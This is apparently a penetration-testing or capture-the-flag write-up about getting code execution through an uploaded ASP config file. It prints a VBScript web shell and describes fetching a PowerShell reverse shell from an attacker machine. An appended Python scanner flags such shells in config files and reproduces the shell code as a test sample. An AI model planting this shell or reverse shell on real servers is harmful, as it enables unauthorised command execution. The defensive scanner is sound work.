Exploitation
Based on the information from before, we know that we can execute aspx. This was confirmed by the math expression, which was evaluated in the page we loaded earlier. Let's upload a shell.
Executing Commands via created script
Create a file called web.aspx with the following code.
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Next, add that code to the end of the config file we created earlier.

Set up an ICMP listener on our attack machine to see if there is communication between the server and us.
The server is communicating with us. That is good news.
Establishing Reverse Shell
At the bottom of the shell.ps1 script, set up your listener with the following code.
Modified config file that will download our shell. This creates an object instance of a Windows shell. Then we use this instance to invoke PowerShell in order to download the PowerShell TCP shell from our exploit machine.
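The defensive counterpart to the technique above, as an added example that is not part of the original write-up: a check an upload handler or file-integrity job could run on .config files, flagging server-side script blocks and the WScript.Shell pattern from the snippet earlier on this page. The function names, verdict labels and sample file contents are assumptions constructed for illustration.

```python
import re

# A legitimate web.config is pure XML; <% ... %> script blocks do not belong in it.
SCRIPT_BLOCK = re.compile(r"<%(.*?)%>", re.DOTALL)
# Indicators taken from the snippet on this page. Matching is case-insensitive
# because VBScript itself is case-insensitive.
INDICATORS = {
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I),
    "process_exec": re.compile(r"\.\s*(Exec|Run)\s*\(", re.I),
    "output_echo": re.compile(r"Response\s*\.\s*Write", re.I),
}

def scan_config(text):
    """Return one finding (line number, matched indicators) per script block."""
    findings = []
    for block in SCRIPT_BLOCK.finditer(text):
        line = text.count("\n", 0, block.start()) + 1
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(block.group(1)))
        findings.append({"line": line, "indicators": hits})
    return findings

def verdict(text):
    """Map findings to an action: clean, review (script present) or block."""
    findings = scan_config(text)
    if any("wscript_shell" in f["indicators"] for f in findings):
        return "block"
    # An unterminated "<%" yields no finding but is still not valid config XML.
    if findings or "<%" in text:
        return "review"
    return "clean"

# Constructed sample: minimal config followed by the block shown on this page.
SAMPLE_UPLOAD = '''<?xml version="1.0" encoding="UTF-8"?>
<configuration>
</configuration>
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("")
o = cmd.StdOut.Readall()
Response.write(o)
%>
'''
# Constructed sample: a config file with no script content.
SAMPLE_BENIGN = '<?xml version="1.0"?>\n<configuration>\n</configuration>\n'

if __name__ == "__main__":
    print(verdict(SAMPLE_UPLOAD), scan_config(SAMPLE_UPLOAD))
    print(verdict(SAMPLE_BENIGN))
```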
